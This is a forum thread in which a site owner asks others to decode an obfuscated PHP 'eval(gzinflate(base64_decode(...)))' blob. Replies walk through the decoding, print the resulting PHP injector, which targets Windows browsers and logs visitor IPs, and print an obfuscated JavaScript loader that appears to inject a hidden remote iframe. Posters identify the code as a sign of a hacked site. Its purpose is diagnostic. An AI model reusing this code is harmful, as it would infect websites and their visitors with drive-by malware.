SitePoint Sponsor

User Tag List

Results 1 to 10 of 10
  1. #1
    SitePoint Member
    Join Date
    Nov 2012
    Posts
    3
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Question Decoding <?php eval(gzinflate(base64_decode('

    Hi,

    Can anyone decode this for me please:
    Code:
    <?php eval(gzinflate(base64_decode('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')));?>

  2. #2
    Programming Since 1978 silver trophybronze trophy felgall's Avatar
    Join Date
    Sep 2005
    Location
    Sydney, NSW, Australia
    Posts
    16,786
    Mentioned
    25 Post(s)
    Tagged
    1 Thread(s)
    just replace eval with echo to display the decoded value without running it.
    Stephen J Chapman

    javascriptexample.net, Book Reviews, follow me on Twitter
    HTML Help, CSS Help, JavaScript Help, PHP/mySQL Help, blog
    <input name="html5" type="text" required pattern="^$">

  3. #3
    SitePoint Member
    Join Date
    Nov 2012
    Posts
    3
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by felgall View Post
    just replace eval with echo to display the decoded value without running it.
    and?

    Code:
    <?php echo(gzinflate(base64_decode('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')));?>
    how to decode? i dont know ...

  4. #4
    SitePoint Enthusiast
    Join Date
    Nov 2012
    Posts
    24
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    you can decode them online...

    http://bit.ly/SKNwGS

  5. #5
    SitePoint Member
    Join Date
    Nov 2012
    Posts
    3
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Before asking here i search in google, but ...

    please see final decoded code:
    Code:
    if (!isset($ftl)){ global $ftl;$ftl=1; $ip=$_SERVER['REMOTE_ADDR'];$dr=$_SERVER['DOCUMENT_ROOT'];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5(date('m.d.y'));$odbf = $dr.'/'.md5(date('m.d.y'),time()-86400); if (file_exists($odbf))@unlink($odbf); if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false||(strpos($ua,'Opera')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false))){  error_reporting(0);  print(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iHjfTuli1R219/YuL862rYjmrrsazarpe5Mv2jvz9vY/MBx99/3sfTarZ9Uff/+yj3b17H/2SadZO51uT7Cpv6f93YjB+8eVn8tEhOjnPrib59ra+mJ0vr/JlfnXnF+O7rctPLu9s3dHvLpYXdTtfylcEd2dv57PPPtt5t7tz5/JGjC7OZ8vz2cUkr+/84sVn9MUhQdjKyrxuP/nooztjQih/9+X51kfL7KNPPmoL+ucy/+jO7/rZZ9u7d3KD8fc+yi+z8qPvH/6SX5IsP/veRw8/GvH/9+/jnz36Z/cB/jnHnzv4Z0L/3Kvw2xz/cONd/JPhnws0LvHbPfsFPtv7afx2YD+LvLaPPvb4NwC4hyb3FgbUvXv2T/suY7Wb44ulQU2QLM0Xu4B3j7FCk3uF+Wwff84+ktH2R73PUMPu+DPpk4eEL3wI99E1k0ua82jPzZ/yRbTX96IrExKYCLIXpp0ghtf2Mvvt0FAEmXP7LfrdAwZMtP19C5n/meJbjGZ3Yf5hNATogf2HwfMk8BDczPI4eJTn5luZMUCWwfBrn5rGQgjLFTJyHhED5WExugvTTn7D9PK78gaD3ze/7YHwwpd4l8e7x3PGE8skYepyR4wuYwAAjji7DH5p/3xgmsgo+d179jNmlM3vnpt2zLVORrz5wLAE8rn5TejHnx3Y3ywUni3BwA2G/7EsxewrFGLaW8gC5b79ghsDHk+39Htuv+WOeLrtTAtkJ+t75lvhoaVtwm8wFMdh9lse+R5/AQxkfjcyNTdmCdggn/4HAsnyqsd04ehlnjb23dENcTln7uT33OxbFSvTzZ+9jz6QJrn5VsC7qbhZ7ToleoPKYJwtYQVx5lir4mSSHT/zPxaycE7IKl7noTKS3n7afvvzUiMNEtvKuZta+Ra9vZ+icEpmo7YQaXwvXG6rWiwGt9UvXwOXmDKy/TqF/H5A+Qunvm4L74Ml5adNu46N6shM19j87InuRut3W6x62vJ9tOD/m71NBs+gpvYfhwsA7PHYnPwdmC/E7ebpitKJLNr3D+ef7R02n330Efz/xZ3zqt4qPts5LLY/3bn/u+KXTz6584vfflYc2sDFDy3uNJ989rqti+XF9z46rysKEhYn9M88q0+qWf7R97dWWd3kZ8t2a/m94vujvft37hz+kh981hzml1s/uPNLfskveXxX46v/JwAA//8=')));  if ($fp = @fopen($dbf , 'a')){fputs($fp , $ip.'|'); fclose($fp);} }}
    if i try decode this code:
    Code:
    7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iHjfTuli1R219/YuL862rYjmrrsazarpe5Mv2jvz9vY/MBx99/3sfTarZ9Uff/+yj3b17H/2SadZO51uT7Cpv6f93YjB+8eVn8tEhOjnPrib59ra+mJ0vr/JlfnXnF+O7rctPLu9s3dHvLpYXdTtfylcEd2dv57PPPtt5t7tz5/JGjC7OZ8vz2cUkr+/84sVn9MUhQdjKyrxuP/nooztjQih/9+X51kfL7KNPPmoL+ucy/+jO7/rZZ9u7d3KD8fc+yi+z8qPvH/6SX5IsP/veRw8/GvH/9+/jnz36Z/cB/jnHnzv4Z0L/3Kvw2xz/cONd/JPhnws0LvHbPfsFPtv7afx2YD+LvLaPPvb4NwC4hyb3FgbUvXv2T/suY7Wb44ulQU2QLM0Xu4B3j7FCk3uF+Wwff84+ktH2R73PUMPu+DPpk4eEL3wI99E1k0ua82jPzZ/yRbTX96IrExKYCLIXpp0ghtf2Mvvt0FAEmXP7LfrdAwZMtP19C5n/meJbjGZ3Yf5hNATogf2HwfMk8BDczPI4eJTn5luZMUCWwfBrn5rGQgjLFTJyHhED5WExugvTTn7D9PK78gaD3ze/7YHwwpd4l8e7x3PGE8skYepyR4wuYwAAjji7DH5p/3xgmsgo+d179jNmlM3vnpt2zLVORrz5wLAE8rn5TejHnx3Y3ywUni3BwA2G/7EsxewrFGLaW8gC5b79ghsDHk+39Htuv+WOeLrtTAtkJ+t75lvhoaVtwm8wFMdh9lse+R5/AQxkfjcyNTdmCdggn/4HAsnyqsd04ehlnjb23dENcTln7uT33OxbFSvTzZ+9jz6QJrn5VsC7qbhZ7ToleoPKYJwtYQVx5lir4mSSHT/zPxaycE7IKl7noTKS3n7afvvzUiMNEtvKuZta+Ra9vZ+icEpmo7YQaXwvXG6rWiwGt9UvXwOXmDKy/TqF/H5A+Qunvm4L74Ml5adNu46N6shM19j87InuRut3W6x62vJ9tOD/m71NBs+gpvYfhwsA7PHYnPwdmC/E7ebpitKJLNr3D+ef7R02n330Efz/xZ3zqt4qPts5LLY/3bn/u+KXTz6584vfflYc2sDFDy3uNJ989rqti+XF9z46rysKEhYn9M88q0+qWf7R97dWWd3kZ8t2a/m94vujvft37hz+kh981hzml1s/uPNLfskveXxX46v/JwAA//8=

    see result:
    Code:
    �`I�%&/m�{J�J��t��`$ؐ@�����5G#)�*��6V6]f@�흼��{���{��;�N'���?\fdl��J�ɞ!���?~|?"��t�w-�&3�~��s��6e����v���~�b�����>}�����/�|s��?}�����n�����'_}q�������/���4�~���������+���?�������������[��ͷ>^�g����9��*j�CMFm�ȷ�l|���s�b\�E����5�-q���^����)
    ����^U�f��>�n��UW��w~��>;��&��2���g���?�u�ϊ:?�޹��\�4������_���?��m��@sD���~��g��r��?��4U��4���X^l��lU�v�����&Y������5e#�=x�����ɻ��W��{�~�������W������'��3~����?����~�g�<�]���b�ѓ��O~�~rw����/�����<xp�޽����y���w������?x8��O<���|�,>?�E����{�����?}�f]���v��}��>ݫ��^�4�� �W��/.�~��/��_<y����{�����_�O���d�����f?E]��<8Y]~z������O>9�ryОο���˺��Xg�,��sY��Ny���>��A=m_>_?l�;}�|���޳7��49=���.�?x��6��3�?��;���Ƀ/���{ӯ�֟�=�3~r���?a����~�~ywYU?h�'��݇����wߞ?�{�x�rQ=�d=����O��n�S?�p�`v��zzp>���������~���ּ�{���:��9}��?���O��� ����.�j���{����޻ܝ~�bv�;/�˫f���'/ϛg/�������'�/�g/_^N�_\��ϯ'�]L���/���mֿσ�N����O|��Ͽ����O���g'3ﭟ}�ݫ���O޶��{���˯�x�����������Ow����~�{�j���~��Y}����}N���ޫ��ż=�����yv|��_>x~^ώ�~�����˻��;������>���/��T�{߾:�������<�Ͽ�fy�\��_�1O����������|����ӧ�{�n}q�����Ӈ/���{?��>�}�}4����w�^~~zм�}������s4|��?]<x�����],����?�bQ~q�r�j�~��'�|U���������M���^����ܻ��jY�{r4�����ͻ�~����'�'^̛��~�ɽ��nח�|���yݾ9n�~�����r^6?�^-��}a�?$������?����OO�_��-Nf˻��>n�׿������r�ӓ�{���7����ͽ{_��<{}��?����?���'���ho��3�o�^�^��w����'~�����_����|�]OO��^�6���z}3I,ry�/^��������W��˟�Ճ��'��������������Cb��/�������_��������b���/�����z���1�/v������պ���O�}�w��O�.�x�|r���}��W����}�/�h�wO�U��^�y�����������{;��?���������6�����{3�����������������u�k�>{z}3��;ֿ�->�=�����4�{���у�_���/�.A~�`������v/��x�������ރ�>y;x�;���m�_�x~޼���w�����w�C�s���gd�D��n�+oE��y�

  6. #6
    SitePoint Enthusiast
    Join Date
    Nov 2012
    Posts
    24
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yeah, the second part you have is wrapped in a 'gzinflate'
    that means that the text is gzipped.

    so you need to gzinflate the funny looking text....

  7. #7
    SitePoint Enthusiast
    Join Date
    Nov 2012
    Posts
    24
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

  8. #8
    Barefoot on the Moon! silver trophy Force Flow's Avatar
    Join Date
    Jul 2003
    Location
    Northeastern USA
    Posts
    4,606
    Mentioned
    56 Post(s)
    Tagged
    1 Thread(s)
    Usually any time you've found "eval(gzinflate(base64_decode" in your PHP files, it's typically an indicator that your site has been hacked and code has been injected into your PHP files.

    Here's the second encoded section found inside the print function:

    Code:
    <script>try{if(window.document)window["document"]["body"]="123"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];}}n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","4j","3m","48","48","49","4b","4h","4a","4g","41","40","4f","4h","3n","4c","4e","4b","46","41","3o","4g","4f","1l","45","4a","42","4b","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","4j","3m","48","48","49","4b","4h","4a","4g","41","40","4f","4h","3n","4c","4e","4b","46","41","3o","4g","4f","1l","45","4a","42","4b","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(m)for(i=0;i-605!=0;i++){k=i;if(window["document"])s+=String["fro"+"mC"+"harCode"](parseInt(n[i],25));}z=s;ev(z)}}}</script>
    It looks like it opens a javasript window of some sort.
    Visit The Blog | Follow On Twitter
    301tool 1.1.5 - URL redirector & shortener (PHP/MySQL)
    Can be hosted on and utilize your own domain

  9. #9
    SitePoint Enthusiast
    Join Date
    Nov 2012
    Posts
    24
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yeah, they are usually from php shell scripts or from scripts that inject a popup window to get advert money for the person who injected it

  10. #10
    Keeper of the SFL StarLion's Avatar
    Join Date
    Feb 2006
    Location
    Atlanta, GA, USA
    Posts
    3,748
    Mentioned
    69 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Force Flow View Post
    Usually any time you've found "eval(gzinflate(base64_decode" in your PHP files, it's typically an indicator that your site has been hacked and code has been injected into your PHP files.
    Or, you're trying to modify someone's copyright notice, and they've tried to make it difficult to do so.
    Never grow up. The instant you do, you lose all ability to imagine great things, for fear of reality crashing in.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •